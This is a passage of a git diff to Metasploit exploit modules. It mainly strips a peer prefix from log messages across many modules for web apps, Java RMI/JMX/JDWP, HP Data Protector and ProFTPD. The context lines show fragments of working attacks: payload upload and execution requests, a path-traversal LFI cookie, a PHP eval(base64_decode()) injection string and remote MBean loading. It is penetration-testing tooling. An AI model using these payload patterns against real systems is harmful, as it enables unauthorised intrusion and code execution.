send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0) end diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 41e4dfa4da..8531ee69dc 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote "form-data; name=\"file\"; filename=\"#{fname}\"" #Content Disposition ) - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/work/resultimage.php"), @@ -115,18 +115,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end @target_path = normalize_uri("#{base}/results/#{fname}") - print_status("#{peer} - Requesting #{@target_path}") + print_status("Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) handler if res and res.code == 404 - print_error("#{peer} - Payload failed to upload") + print_error("Payload failed to upload") end end end diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 71c2f8d6eb..18503fd504 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -209,13 +209,13 @@ class Metasploit3 < Msf::Exploit::Remote @base = normalize_uri(target_uri.path) @base << '/' if @base[-1, 1] != '/' - print_status("#{peer} - Getting cookie") + print_status("Getting cookie") cookie = get_cookie - print_status("#{peer} - Logging in") + print_status("Logging in") cred = login(cookie) - print_status("#{peer} - Triggering spam logging") + print_status("Triggering spam logging") inject_exec(cred) handler diff --git a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb index f58aa5b783..b22c77322b 100644 --- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb +++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file to #{tomcat_path}") + print_status("Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else - print_error("#{peer} - Failed to upload, try again with a different path?") + print_error("Failed to upload, try again with a different path?") return false end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote Rex.sleep(2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb index c6861a0ea3..fcecbbebdf 100644 --- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb +++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote if fingerprint =~ /Data Protector A\.(\d+\.\d+)/ version = $1 - vprint_status("#{peer} - Windows / HP Data Protector version #{version} found") + vprint_status("Windows / HP Data Protector version #{version} found") elsif fingerprint =~ / INET/ - vprint_status("#{peer} - Linux / HP Data Protector found") + vprint_status("Linux / HP Data Protector found") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -106,25 +106,25 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_exec = rand_text_alpha(8) - print_status("#{peer} - Leaking the HP Data Protector directory...") + print_status("Leaking the HP Data Protector directory...") leak = leak_hp_directory(rand_exec) dir = parse_dir(leak, rand_exec) if dir.nil? dir = default_hp_dir - print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}") + print_error("HP Data Protector dir not found, using the default #{dir}") else unless valid_target?(dir) - print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") + print_error("HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") end end if target.name =~ /Windows/ #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true}) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_windows(payload.encoded, dir) else - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_linux(payload.encoded, dir) end end @@ -265,10 +265,10 @@ class Metasploit3 < Msf::Exploit::Remote def parse_dir(data, clue) if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") else dir = nil end diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 3bd4d88285..2304aa8855 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote nb_entries.times do |var| if var != 0 && var % 1000 == 0 - vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}") + vprint_status("Parsed #{var} classes of #{nb_entries}") end data = {} @@ -691,13 +691,13 @@ class Metasploit3 < Msf::Exploit::Remote path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" if @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Linux target...") + print_warning("#{@os} system detected but using Linux target...") end when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" unless @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Windows target...") + print_warning("#{@os} system detected but using Windows target...") end end @@ -837,7 +837,7 @@ class Metasploit3 < Msf::Exploit::Remote # 2. Suspend the VM before setting the event suspend_vm - vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}") + vprint_status("Setting 'step into' event in thread: #{t_id}") step_info = format(@vars["objectid_size"], t_id) step_info << [STEP_MIN].pack('N') step_info << [STEP_INTO].pack('N') @@ -868,13 +868,13 @@ class Metasploit3 < Msf::Exploit::Remote value = get_value(sys_class["reftype_id"], sec_field) if(value == 0) - print_good("#{peer} - Security manager was not set") + print_good("Security manager was not set") else set_value(sys_class["reftype_id"], sec_field, 0) if get_value(sys_class["reftype_id"], sec_field) == 0 - print_good("#{peer} - Security manager has been disabled") + print_good("Security manager has been disabled") else - print_good("#{peer} - Security manager has not been disabled, trying anyway...") + print_good("Security manager has not been disabled, trying anyway...") end end end @@ -884,7 +884,7 @@ class Metasploit3 < Msf::Exploit::Remote # 0. Fingerprinting OS fingerprint_os(thread_id) - vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}") + vprint_status("Executing payload on \"#{@os}\", target version: #{version}") # 1. Prepares the payload payload_exe, pl_exe = setup_payload @@ -927,27 +927,27 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "JDWP Protocol not found") end - print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...") + print_status("Retrieving the sizes of variable sized data types in the target VM...") get_sizes - print_status("#{peer} - Getting the version of the target VM...") + print_status("Getting the version of the target VM...") get_version - print_status("#{peer} - Getting all currently loaded classes by the target VM...") + print_status("Getting all currently loaded classes by the target VM...") get_all_classes - print_status("#{peer} - Getting all running threads in the target VM...") + print_status("Getting all running threads in the target VM...") get_all_threads - print_status("#{peer} - Setting 'step into' event...") + print_status("Setting 'step into' event...") r_id, t_id = set_step_event - print_status("#{peer} - Resuming VM and waiting for an event...") + print_status("Resuming VM and waiting for an event...") response = resume_vm unless parse_event(response, r_id, t_id) datastore['NUM_RETRIES'].times do |i| - print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...") + print_status("Received #{i + 1} responses that are not a 'step into' event...") buf = read_reply break if parse_event(buf, r_id, t_id) @@ -957,14 +957,14 @@ class Metasploit3 < Msf::Exploit::Remote end end - vprint_status("#{peer} - Received matching event from thread #{t_id}") - print_status("#{peer} - Deleting step event...") + vprint_status("Received matching event from thread #{t_id}") + print_status("Deleting step event...") clear_event(EVENT_STEP, r_id) - print_status("#{peer} - Disabling security manager if set...") + print_status("Disabling security manager if set...") disable_sec_manager - print_status("#{peer} - Dropping and executing payload...") + print_status("Dropping and executing payload...") exec_payload(t_id) disconnect diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index d5221281f4..2823fe48f0 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -131,18 +131,18 @@ class Metasploit3 < Msf::Exploit::Remote @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") unless is_rmi? fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") end - print_status("#{peer} - Discovering the JMXRMI endpoint...") + print_status("Discovering the JMXRMI endpoint...") mbean_server = discover_endpoint disconnect if mbean_server.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") else - print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") + print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") end # First try to connect to the original RHOST, since the mbean address may be inaccessible @@ -157,20 +157,20 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") end - print_status("#{peer} - Proceeding with handshake...") + print_status("Proceeding with handshake...") jmx_endpoint = handshake(mbean_server) if jmx_endpoint.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") else - print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") + print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") end - print_status("#{peer} - Loading payload...") + print_status("Loading payload...") unless load_payload(jmx_endpoint) fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_jmx_invoke( object_number: jmx_endpoint[:object_number], uid_number: jmx_endpoint[:uid].number, @@ -199,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote return nil if ref.nil? unless ref[:object] == 'javax.management.remote.rmi.RMIServerImpl_Stub' - vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{ref[:object]}") + vprint_error("JMXRMI discovery returned unexpected object #{ref[:object]}") return nil end @@ -223,7 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote ref = send_new_client(opts) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - JMXRMI discovery raised an exception of type #{e.message}") + vprint_error("JMXRMI discovery raised an exception of type #{e.message}") return nil end @@ -231,7 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload(conn_stub) - vprint_status("#{peer} - Getting JMXPayload instance...") + vprint_status("Getting JMXPayload instance...") begin res = send_jmx_get_object_instance( @@ -244,10 +244,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceNotFoundException' - vprint_warning("#{peer} - JMXPayload instance not found, trying to load") + vprint_warning("JMXPayload instance not found, trying to load") return load_payload_from_url(conn_stub) else - vprint_error("#{peer} - getObjectInstance returned unexpected exception #{e.message}") + vprint_error("getObjectInstance returned unexpected exception #{e.message}") return false end end @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload_from_url(conn_stub) - vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...") + vprint_status("Creating javax.management.loading.MLet MBean...") begin res = send_jmx_create_mbean( @@ -272,23 +272,23 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceAlreadyExistsException' - vprint_good("#{peer} - javax.management.loading.MLet already exists") + vprint_good("javax.management.loading.MLet already exists") res = true when 'java.lang.SecurityException' - vprint_error("#{peer} - The provided user hasn't enough privileges") + vprint_error(" The provided user hasn't enough privileges") res = nil else - vprint_error("#{peer} - createMBean raised unexpected exception #{e.message}") + vprint_error("createMBean raised unexpected exception #{e.message}") res = nil end end if res.nil? - vprint_error("#{peer} - The request to createMBean failed") + vprint_error("The request to createMBean failed") return false end - vprint_status("#{peer} - Getting javax.management.loading.MLet instance...") + vprint_status("Getting javax.management.loading.MLet instance...") begin res = send_jmx_get_object_instance( object_number: conn_stub[:object_number], @@ -298,16 +298,16 @@ class Metasploit3 < Msf::Exploit::Remote name: 'DefaultDomain:type=MLet' ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - getObjectInstance returned unexpected exception: #{e.message}") + vprint_error("getObjectInstance returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The request to GetObjectInstance failed") + vprint_error("The request to GetObjectInstance failed") return false end - vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") + vprint_status("Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") begin res = send_jmx_invoke( @@ -320,12 +320,12 @@ class Metasploit3 < Msf::Exploit::Remote args: { 'java.lang.String' => "#{get_uri}/mlet" } ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - invoke() returned unexpected exception: #{e.message}") + vprint_error("invoke() returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The call to getMBeansFromURL failed") + vprint_error("The call to getMBeansFromURL failed") return false end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index 90f87dea99..7e2133acab 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") send_header ack = recv_protocol_ack if ack.nil? @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote jar = rand_text_alpha(rand(8)+1) + '.jar' new_url = get_uri + '/' + jar - print_status("#{peer} - Sending RMI Call...") + print_status("Sending RMI Call...") dgc_interface_hash = calculate_interface_hash( [ { diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index f35930adfb..0e39c322d6 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.close - print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") + print_status("Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb index 4fdbb98670..1b2de6b94b 100644 --- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb +++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return Exploit::CheckCode::Unknown end @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Exploit::Remote version = $2 build = $1 - vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected") + vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected") else - vprint_status("#{peer} - Unexpected vmtadmin.cgi response") + vprint_status("Unexpected vmtadmin.cgi response") return Exploit::CheckCode::Unknown end @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return nil end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") end - print_status("#{peer} - Blind Exploitation - unknown exploitation state") + print_status("Blind Exploitation - unknown exploitation state") return end diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index 8cb29c5e9f..99d0bc71fd 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -65,22 +65,22 @@ class Metasploit3 < Msf::Exploit::Remote # check for aa.php res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error("#{peer} - Could not find aa.php") + vprint_error("Could not find aa.php") return Exploit::CheckCode::Safe elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/ - vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.") + vprint_error("ActualAnalyzer is not installed. Try installing first.") return Exploit::CheckCode::Detected end # check version res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body - vprint_status("#{peer} - Found version: #{version}") + vprint_status("Found version: #{version}") if Gem::Version.new(version) <= Gem::Version.new('2.81') report_vuln( host: rhost, @@ -124,12 +124,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on view.php") + vprint_status("Could not find any hosts on view.php") end nil end @@ -146,12 +146,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on code.php") + vprint_status("Could not find any hosts on code.php") end nil end @@ -184,12 +184,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && res.body =~ />Login</ - vprint_status("#{peer} - Login failed.") + vprint_status("Login failed.") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") - print_good("#{peer} - Login successful! (#{user}:#{pass})") + vprint_good("Found analytics host: #{analytics_host}") + print_good("Login successful! (#{user}:#{pass})") service_data = { address: Rex::Socket.getaddress(rhost, true), port: rport, @@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote create_credential_login(login_data) return analytics_host else - vprint_status("#{peer} - Could not find any hosts on admin.php") + vprint_status("Could not find any hosts on admin.php") end nil end @@ -230,10 +230,10 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out") elsif res.code == 302 && res.headers['Content-Type'] =~ /image/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") return true elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/ - vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") + vprint_status("Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") elsif res.code == 200 && res.body =~ /Admin area<\/title>/ fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.") else @@ -257,7 +257,7 @@ class Metasploit3 < Msf::Exploit::Remote end analytics_hosts.uniq.each do |host| next if host.nil? - vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") + vprint_status("Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") break if execute_command(payload.encoded, analytics_host: host) end end diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 9b029120b6..c97f321c9a 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "10.0.10" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") + print_status("Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "scripts", "upload.php"), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("/tmp/ApplianceUpdate") - print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") + print_status("Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'GET', 'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" }, @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 55abc7908c..2c98d91f63 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check version peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "2.6" return Exploit::CheckCode::Safe @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php" - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"), @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) + print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name) @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 10291ae9a6..d39e728937 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the preg_replace() to execute PHP code") + print_status("Exploiting the preg_replace() to execute PHP code") res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") end end diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index a218ee92b0..8b24944c6f 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}egallery/uploadify.php"), @@ -102,11 +102,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index b4cb968c14..6324068bf5 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") if version =~ /6\.0\.(2|4|5|6|7|8)/ return Exploit::CheckCode::Appears @@ -132,14 +132,14 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path # upload - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) # register the file to clean register_files_for_cleanup(fname) # exec - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index 58afa2be55..f530c09ab0 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version =~ /2\.(9|10|11)\.0/ return Exploit::CheckCode::Appears @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_data = rand_text_alpha_lower(rand(10) + 5) - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "admin", "config.php"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index 5c2569966f..5d3afc9353 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ 